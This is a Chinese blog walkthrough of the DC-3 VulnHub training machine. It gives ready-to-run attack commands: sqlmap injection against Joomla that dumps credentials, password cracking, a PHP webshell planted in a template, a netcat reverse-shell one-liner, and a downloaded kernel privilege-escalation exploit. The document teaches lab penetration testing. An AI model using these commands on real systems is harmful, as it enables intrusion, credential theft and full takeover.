Neos的渗透测试靶机练习——DC-3

已于 2024-01-08 22:40:00 修改
阅读量1k 收藏 20
点赞数 19
分类专栏: 靶场练习 文章标签: 网络 安全 渗透测试 网络安全 web安全
于 2024-01-08 17:13:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38678845/article/details/135453379
版权

DC-3

一、实验环境

虚拟机软件:VirtualBox
攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
靶机:DC-3(网卡初始为仅主机模式,要有安全意识)

二、开始渗透

1. 搜集信息

输入sudo su,将kali切换到root权限
切root权限
输入ifconfig查询自身ip,即攻击机ip
查自身ip
可以看到自身ip192.168.56.101,对应的网卡名称为eth0
本次渗透我们选择输入netdiscover -i eth0扫描本网段存活主机,即靶机ip地址
靶机ip
可以看到靶机ip192.168.56.106,。
输入nmap -sV -p- 192.168.56.106,查看靶机端口开放信息
靶机端口
看到只开放了一个80端口,即http服务
浏览器输入192.168.56.106:80。
网站页面
命令行输入whatweb -v 192.168.56.106查询网站指纹信息。
网站指纹
可以看到一些关键信息,其中Joomla是一个基于PHP内容管理系统(CMS)

2. sqlmap

至此,基本思路为扫目录,查找有没有后台登陆界面。
有一个针对Joomla的目录扫描工具-Joomscan
命令行输入joomscan --url 192.168.56.106
Joomla信息
发现Joomla版本号和一个admin页面http://192.168.56.106/administrator/,浏览器打开。
后台登陆
基本思路是看看有没有sql注入Joomla版本漏洞,作为一个脚本小子,根本没精力自己注入好吧,searchsploit扫起来。
Joomla漏洞
cat看看这个42033.txt的内容。
使用sqlmap
这里exp教我们使用sqlmap进行sql注入
命令行输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap爆破
可以看到爆破出来了几个数据库,这里我们瞄准joomladb,继续爆破表名。输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
爆破表名
出来了一长串,我们看到下方有#_users表,应该跟用户信息有关,针对该表,爆破属性名。
输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
属性名
爆破出来了几个属性名,瞄准nameusernamepassword,继续爆破。
输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,username,password --dump -p list[fullordering]
用户名密码
爆破出来了用户名admin和一长串的加密密码
将加密字符串写入一个pswd.txt文件中。并输入john pswd.txt进行解密。密码解密
得解密密码为snoopy,重新登陆后台。
login
登陆后台

3. 上传PHP木马

发现Templates版块中可以编辑PHP文件,可上传PHP木马
我这里使用Webacoo生成PHP木马
命令行输入webacoo -g -o test1.php,将test1.php中的内容上传,文件名为shell.php中并保存,注意格式。
上传php木马
命令行输入webacoo -t -u http://192.168.56.106/templates/beez3/shell.php成功连接后台。
连接后台
发现自己是www-data用户,linux版本为4.0.21,Ubuntu为16.04。
系统信息
攻击机输入nc -lvvp 4444监听4444号端口,
靶机输入rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.101 4444 >/tmp/f,反弹shell。
输入searchsploit Ubuntu 16.04,选则39772.txt进行提权。
39772
输入cat /usr/share/exploitdb/exploits/linux/local/39772.txt,其中给出了exp的下载地址。
39772的下载地址
此时注意,将网卡设置为网络地址转换NAT模式,命令行输入wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip,将该压缩包下载到本地,然后将网卡调回到仅主机模式
下载到本地
将该压缩包传到靶机上,攻击机命令行输入python -m http.server 8080
靶机命令行输入 wget http://192.168.56.101:8080/39772.zip
上传到靶机
靶机中输入unzip 39772.zip,解压该压缩包。
解压
输入tar-xvf exploit.tar解压其中的exploit.tar。
解压exploit.tar
进入ebpf_mapfd_doubleput_exploit目录,运行之中的compile.sh文件和doubleput.c文件。
得到root权限
至此,我们得到了root权限,root目录获得最终flag。
最终flag

至此,渗透结束。

三、总结

每一次新的渗透都是一堆没学过的新的知识,希望大家能知其然,亦知其所以然,渗透结束了,可是其中大量的为什么需要你私下去思考并解决,学的只是思路,但是为什么这个思路,为什么用这个工具,还需要多多琢磨。

Dr.Neos
关注
专栏目录
DC-3靶机
m0_62094846的博客
02-20 3142
ifconfig nmap 192.168.61.0/24 nmap -A -p- 192.168.131 使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等 whatweb http://192.168.61.131 发现靶机使用Joomla内容管理系统 使用joomscan扫描工具扫描Joomla相关配置内容、已知漏洞等等 扫描后得知Joomla版本3.7.0,管理员登录页面,及一些可以访问的网站目录 joomscan --u 192.168.61
dc-3靶机渗透
最新发布
tmyzxy1314的博客
07-04 941
dc-3靶机下载链接:启动靶机遇到的问题解决文章在下面kali最新版 dc-3靶机 两台机器都在vmware上运行 网络设置NAT模式。
neos-simple-editor-extend:通过YAML-Configuration扩展Neos CKEditor的简单方法
05-14
composer require breadlesscode/neos-simple-editor-extend --no-update --no-update命令可防止自动更新依赖关系。 将软件包添加到主题composer.json后,请返回Neos安装的根目录并运行composer更新。 现
neos-ui-extensibility-examples:Neos UI可扩展性示例
05-14
git clone git@github.com:neos/neos-ui-extensibility-examples.git Neos.Neos.Ui.ExtensibilityExamples cd ../../ ./flow flow:package:rescan 如何建立范例 目前,这些示例仅适用于纱线,不适用于NPM安装。 转...
neos-normalize:@neos21neos-normalize
05-31
Neo 的标准化:@ neos21 / neos-normalize 基于Normalize.css的思想,制定与Windows、Mac、iOS最新浏览器的最小必要规范化样式。我们不会完全统一所有元素的样式,而是仅对经常使用的元素进行最小样式化。 演示 ...
docker-typo3neos:运行新的typo3neos的码头工人
07-02
用于 TYPO3 Neos 的 Docker 概述 这个 docker 为 TYPO3 Neos 提供了一个简单、新鲜且几乎完全可定制的安装。 默认情况下,安装了带有 Demo Package 的 TYPO3 Neos 实例。 您甚至可以选择要在哪个版本中使用它(例如 ...
sitegeist-neos-base-distribution:Sitegeist Neos基础分布
04-14
composer create-project sitegeist/neos-base-distribution customer-folder 将随附的Vendor.Site包复制到项目名称空间# ddev flow package:adopt Vendor.Site Customer.Site 需要Project程序包,并删除对...
DC3靶机
PigLL的博客
08-11 458
## 关于DC3 靶机实验 1.信息收集: 2.网站信息 在浏览器中访问DC3的IP 利用工具kali中的nikto做一个简单的信息识别 通过扫描可以看到一些目录 然后通过浏览器可以访问 然后利用joomla专用的扫描工具joomscan扫描 发现了joomla的版本和一些目录 通过kali中的工具searchsploit扫描joomla 3.7.0版本存在的漏洞 通过扫描发现了一个42033.txt文件 通过searchsploit 将42033文件下载到当前目录 查看42033文件 发现
DC靶机系列:DC-3
Ays.Ie的博客
02-22 240
本篇文章为DC系列第三个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
【vulnhub靶机DC-3
travelnight的博客
03-10 4851
原知识星球老文搬运 拿到靶机之后导入到virtualBOX里面。 1. nmap扫描主机存活,192.168.56.104 有个80端口,不放心的话可以用masscan。 2. 直接访问看下,这里提示只有一个flag,直接拿到root权限。 3. 习惯性的上一下dirbuster。发现访问到不存在的URL时候服务器也是返回200OK,这个扫描就没有什么参考价值了。 4.御剑扫描一下,发现后台页面。这个是joomlaCMS 5.参考了下知乎的这个joomla渗透,https
CTF靶机 DC-3
weixin_52221158的博客
09-02 867
CTF靶场 DC-3详细讲解
渗透测试DC-3靶机
Ciyaso的博客
08-16 492
零、修改网卡 扫不到iP需要修改网卡 打卡DC-3时进入这个界面按e键 然后找到g–root 将其后面的值从ro改成rw signie init=/bin/bash 按下Ctrl键+X键进入命令行 查看当前网卡IP信息 ip a,网卡名ens33 编辑网卡配置文件vim /etc/network/interfaces 重启网卡服务/etc/init.d/networking restart,再看看ip a 发现已有ip 一、扫描获取靶机ip arp-scan -l 192.168.203.1
065 渗透测试实战,靶机 DC-3
鸡蛋炒鸡蛋
04-27 891
文章目录
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 4778
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
靶机实战-DC-3
滕财然的博客
01-31 3088
DC-3靶机实战 文章目录DC-3靶机实战1、主机发现2、端口扫描及端口详细信息3、访问web服务(80端口)4、web渗透 没有IP时先修改靶机root密码,然后配置IP 参考链接: https://blog.csdn.net/u014717036/article/details/53455563 1、主机发现 目标ip:192.168.232.167 2、端口扫描及端口详细信息 只开放...
模型无关的反应堆中微子短基线振荡新证据:DANSS与NEOS联合分析
在3+1模型中,两个关键参数——sin²2ϑee(电子型中微子与 sterile 中微子之间的混合角平方)和 Δm412(第四种新物理状态中微子质量差)——被限制在一个特定的区域,即Δm412 ≃ 1.3 eV²,sin²2ϑee = 0.049±0...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值